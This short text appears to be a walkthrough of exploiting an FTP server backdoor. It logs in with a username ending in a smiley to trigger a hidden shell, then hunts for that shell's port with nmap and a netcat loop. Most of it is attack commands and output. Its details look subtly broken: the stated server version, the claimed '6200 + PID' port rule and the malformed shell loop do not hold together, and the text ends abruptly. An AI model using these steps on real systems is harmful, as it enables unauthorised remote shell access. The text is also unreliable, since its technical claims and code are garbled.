ftp <target-ip> Connected to <target-ip>. 220 (vsFTPd 2.0.8) Name (<target-ip>:user): :) 331 Please specify the password. Password: <anything> At this point, the server silently opens a shell on a high port. The port is calculated as 6200 + PID . Since the PID varies, you must scan or guess.
nmap -p6200-6400 <target-ip>
for port in 6200..6300; do echo "Trying port $port" nc -nvz <target-ip> $port 2>&1 | grep open done Once you find the open port (e.g., 6209): vsftpd 2.0.8 exploit